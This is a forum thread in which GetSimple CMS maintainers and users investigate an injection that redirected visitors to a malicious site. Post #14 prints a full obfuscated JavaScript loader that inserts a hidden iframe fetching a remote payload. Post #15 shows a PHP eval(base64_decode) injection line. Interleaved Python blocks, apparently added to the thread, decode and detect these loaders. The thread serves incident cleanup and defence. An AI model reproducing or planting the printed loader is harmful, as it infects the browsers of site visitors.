gs hacked?
#1
Looks like this site (May 11, 9am CET) has been hacked and now it's injecting a script redirecting users to http://lbxdmes.usa.cc/?go=2

Viewing the page source confirms that something is getting injected on GS pages.

Can anyone confirm?
#2
marrco Wrote: Looks like this site (May 11, 9am CET) has been hacked and now it's injecting a script redirecting users to http://lbxdmes.usa.cc/?go=2

Viewing the page source confirms that something is getting injected on GS pages.

Can anyone confirm?

Avg was preventing me from accessing the GS site with warnings of 'Blackhole Exploit Kit'. But it seems to work again now.
#3
Definitely, now it's fine again. I have locally saved the exploited pages. The HTML was starting with a
Code:
<script>i=0;try{prototype;}catch(z){h="harCode";f=['-33c-33c63c60c-10c-2c58...

Now I'm waiting to know if there's an actual critical bug in GS or what.
#4
Wouldn't say it is over, since I am still attacked when I get to the homepage or forum... (my anti-virus software kills it immediately).

I sent Chris an email early this morning just to be sure he knows about it (I most likely won't be the only one doing that, but at least he will be in the know this way). But it is very clear something was hacked. Could be the forum software, GS (although I think the main site at least used to be Wordpress, maybe not anymore), the server, etc.

Hope things will a. be solved soon, b. that it will be clear what was causing it and c. if it turns out to be GS, how that hole needs to be plugged.
#5
Thanks guys! I have found a rogue file in the /theme/ folder and deleted it. I will keep looking into it to see if this happens again. Thanks for the emails guys!
- Chris
Thanks for using GetSimple! - Download

Please do not email me directly for help regarding GetSimple. Please post all your questions/problems in the forum!
#6
From my side I am still getting the attack attempt blocked notice from my anti-virus software. Could that be cache? Otherwise something might still be active.
#7
Must be cached; it looks clean now.
My Github Repos: Github
Website: DigiMute
#8
Firefox has quite a persistent cache I must say, so that could well be it.

My norton internet security keeps roaring into action in any case. Will keep an eye on it.

Hope it is clear soon what happened.
#9
Can't you try private browsing and see if you still see it?
- Chris
#10
Good point. Just did, still see it. However, if I look at the site in Chrome, I don't get any notice.

So maybe it is still a persistent bit of cache or what have you.
#11
I ran into it just now again, when I logged in for the first time this afternoon.
In the morning, my antivirus program didn't raise any alarm.

Just now there was an alarm.

I cleared the browser cache, will see what's happening.

So much intelligence wasted on such stupid actions ;(
The German-language GetSimple (sub)forum: http://get-simple.info/forums/forumdisplay.php?fid=18
#12
I suggest everyone deletes their GS cache.
It is all infected from the plugin API caches.

Well, mine are, but I'm not sure where it's coming from yet, since it doesn't show up when I do a direct call.

Well, I don't see the injection when accessing directly via my browser, but my curl and file_get_contents both return a script injection.

Either GS is compromised or I have some local injection on my host.

If someone could open a new cache file from the API
gs/data/cache md5.txt
and see if it contains script tags.
NEW: SA Admin Toolbar Plugin | View All My Plugins
- Shawn A aka Tablatronix
#13
I just checked the cache on get-simple.info and inside the API cache that feeds these API calls - and everything looks clean as a whistle. What do you see?
- Chris
#14
ccagle8 Wrote: I just checked the cache on get-simple.info and inside the API cache that feeds these API calls - and everything looks clean as a whistle. What do you see?

Code:
bfbf906471daf3f15be136dfe21ee5a1.txt

<XSS>i=0;try{prototype;}catch(z){h="harCode";f=['-33c-33c63c60c-10c-2c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c-1c81c-29c-33c-33c-33c63c60c72c55c67c59c72c-2c-1c17c-29c-33c-33c83c-10c59c66c73c59c-10c81c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c77c72c63c74c59c-2c-8c18c63c60c72c55c67c59c-10c73c72c57c19c-3c62c74c74c70c16c5c5c60c73c56c56c63c62c63c77c67c4c63c61c61c4c56c63c80c5c21c61c69c19c8c-3c-10c77c63c58c74c62c19c-3c7c6c-3c-10c62c59c63c61c62c74c19c-3c7c6c-3c-10c73c74c79c66c59c19c-3c76c63c73c63c56c63c66c63c74c79c16c62c63c58c58c59c68c17c70c69c73c63c74c63c69c68c16c55c56c73c69c66c75c74c59c17c66c59c60c74c16c6c17c74c69c70c16c6c17c-3c20c18c5c63c60c72c55c67c59c20c-8c-1c17c-29c-33c-33c83c-29c-33c-33c60c75c68c57c74c63c69c68c-10c63c60c72c55c67c59c72c-2c-1c81c-29c-33c-33c-33c76c55c72c-10c60c-10c19c-10c58c69c57c75c67c59c68c74c4c57c72c59c55c74c59c27c66c59c67c59c68c74c-2c-3c63c60c72c55c67c59c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c73c72c57c-3c2c-3c62c74c74c70c16c5c5c60c73c56c56c63c62c63c77c67c4c63c61c61c4c56c63c80c5c21c61c69c19c8c-3c-1c17c60c4c73c74c79c66c59c4c76c63c73c63c56c63c66c63c74c79c19c-3c62c63c58c58c59c68c-3c17c60c4c73c74c79c66c59c4c70c69c73c63c74c63c69c68c19c-3c55c56c73c69c66c75c74c59c-3c17c60c4c73c74c79c66c59c4c66c59c60c74c19c-3c6c-3c17c60c4c73c74c79c66c59c4c74c69c70c19c-3c6c-3c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c77c63c58c74c62c-3c2c-3c7c6c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c62c59c63c61c62c74c-3c2c-3c7c6c-3c-1c17c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c4c55c70c70c59c68c58c25c62c63c66c58c-2c60c-1c17c-29c-33c-33c83'][0].split('c');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];} r=String;z=((e)?h:"");for(;569!=i;i+=1){j=i;if(e)s=s+r["fromC"+z](w[j]*1+42);} 
if(v&&e&&r)e(s);</XSS>{"status":"error","message":"invalid id: item_manager.php"}

Script tags replaced with XSS tags.
It unpacks into a DOM-inserted iframe after body that loads a URL payload.

This shouldn't cause any issues as long as those don't get loaded into a browser, which they shouldn't, unless you're debugging why your plugin lookups aren't working, which I was.
- Shawn A aka Tablatronix
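Shawn's post above describes the mechanism: the loader splits the long string on `c`, adds 42 to every number (the `w[j]*1+42` in the loop), turns the result into characters with `String.fromCharCode`, and hands the text to `eval`. The Python below is an added example written for this thread, not code from the thread, from GetSimple, or from the SA Admin Toolbar plugin. It performs the same unpacking statically, so an analyst can read what a cache file would have executed without ever evaluating it. The only page data it uses is the first 49 values of the blob from the cache file in post #14 (the part before any URL appears); the second sample is constructed here with a matching encoder, and the pattern list is an assumption about what is worth flagging.

```python
import re

# Offset the loader adds to every value before String.fromCharCode (post #14: w[j]*1+42).
OFFSET = 42

# First 49 values of the blob shown in post #14 (page data, cut before any URL appears).
PAGE_BLOB_PREFIX = (
    "-33c-33c63c60c-10c-2c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73"
    "c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c-1c81"
)


def decode_charcode_blob(blob: str, separator: str = "c", offset: int = OFFSET) -> str:
    """Unpack a split/fromCharCode blob exactly as the loader does, minus the eval."""
    out = []
    for token in blob.split(separator):
        token = token.strip()
        if not token:
            continue  # tolerate a trailing or doubled separator
        out.append(chr(int(token) + offset))
    return "".join(out)


def encode_charcode_blob(text: str, separator: str = "c", offset: int = OFFSET) -> str:
    """Inverse of decode_charcode_blob; used here only to build a constructed sample."""
    return separator.join(str(ord(ch) - offset) for ch in text)


# Constructed list of things an analyst would flag in the unpacked text.
SUSPICIOUS_PATTERNS = [
    r"document\.write\s*\(",
    r"createElement\s*\(\s*['\"]iframe['\"]",
    r"<iframe\b",
    r"visibility\s*:\s*hidden",
]


def find_suspicious(decoded: str) -> list:
    """Return the patterns that match the decoded payload (empty list means nothing flagged)."""
    return [p for p in SUSPICIOUS_PATTERNS if re.search(p, decoded, re.IGNORECASE)]


def extract_blob(script_text: str) -> str:
    """Pull the first 'c'-separated numeric blob out of a loader like f=['...'][0].split('c')."""
    m = re.search(r"\['(-?\d+(?:c-?\d+)+)'\]", script_text)
    return m.group(1) if m else ""


if __name__ == "__main__":
    # The page prefix unpacks to the start of the iframe-planting function.
    print(repr(decode_charcode_blob(PAGE_BLOB_PREFIX)))
    # Constructed sample: encode a harmless placeholder and check the heuristics fire on it.
    sample = encode_charcode_blob(
        'document.write("<iframe src=\'http://PLACEHOLDER.invalid/\'></iframe>")'
    )
    decoded = decode_charcode_blob(sample)
    print(decoded, find_suspicious(decoded))
```

Run it against a saved copy of an infected cache file by passing the file's text to `extract_blob` and then `decode_charcode_blob`; because nothing is evaluated, the decoded text can be read and grepped safely, and the iframe URL it contains can be handed to whoever blocks it.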
#15
OK, found it. It must have been a host vulnerability or something... but every index.php file on the server had this at the top:

The reason it was so hard to find was that none of the timestamps were changed on any of the files. If anyone else sees this please let me know... I may have missed a file.

Code:
<?php eval(base64_decode('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'));?>
- Chris
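Chris's post above makes the point that matters for cleanup: the loader sat at the top of every index.php, and the attacker left file timestamps untouched, so sorting by modification time finds nothing. The Python below is an added example written for this thread, not code from the thread or from GetSimple. It walks a web root and reports every .php file whose head carries an `eval(base64_decode(` loader, ignoring mtime on purpose. The sample tree it builds is constructed in a temp directory with a harmless placeholder standing in for the elided base64 payload; the file names and the 4096-byte head size are assumptions.

```python
import base64
import os
import re
import tempfile
import time

# The one-liner shape Chris found at the top of every index.php (payload elided on the page).
INJECTION_RE = re.compile(r"<\?php\s+eval\s*\(\s*base64_decode\s*\(", re.IGNORECASE)


def scan_php_file(path: str, head_bytes: int = 4096) -> bool:
    """True if the start of the file carries an eval(base64_decode(...)) loader."""
    with open(path, "rb") as fh:
        head = fh.read(head_bytes).decode("utf-8", errors="replace")
    return INJECTION_RE.search(head) is not None


def find_injected_php(root: str) -> list:
    """Walk the tree and return sorted, slash-separated relative paths of matching .php files.
    Deliberately never looks at mtime: as the post notes, the timestamps were left untouched."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            if scan_php_file(full):
                hits.append(os.path.relpath(full, root).replace(os.sep, "/"))
    return sorted(hits)


def build_sample_tree() -> str:
    """Constructed web root in a temp dir: two infected index.php files and one clean file.
    Every file is backdated a year so the scan cannot be relying on timestamps."""
    root = tempfile.mkdtemp(prefix="gs_scan_")
    os.makedirs(os.path.join(root, "sub"))
    # Harmless placeholder in place of the real (elided) base64 payload.
    blob = base64.b64encode(b"/* constructed placeholder */").decode()
    loader = "<?php eval(base64_decode('%s'));?>\n" % blob
    samples = {
        "index.php": loader + "<?php echo 'site'; ?>\n",
        "sub/index.php": loader + "<?php echo 'sub'; ?>\n",
        "sub/clean.php": "<?php echo 'clean'; ?>\n",
    }
    old = time.time() - 365 * 86400
    for rel, body in samples.items():
        full = os.path.join(root, rel)
        with open(full, "w") as fh:
            fh.write(body)
        os.utime(full, (old, old))  # backdate, as the real files appeared
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    for rel in find_injected_php(root):
        print("injected loader:", rel)
```

On a real host, point `find_injected_php` at the document root; because the loader could be dropped anywhere in a file, raise `head_bytes` or scan whole files if the first pass comes up empty, and follow the scan by comparing the tree against a clean copy of the same GetSimple release rather than trusting timestamps.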
#16
OK, now clear your caches.

:)
- Shawn A aka Tablatronix
#17
It looks like with the new PunBB install
I am having issues with the toolbar.
It gives JS errors:

Uncaught ReferenceError: PUNBB is not define
- Shawn A aka Tablatronix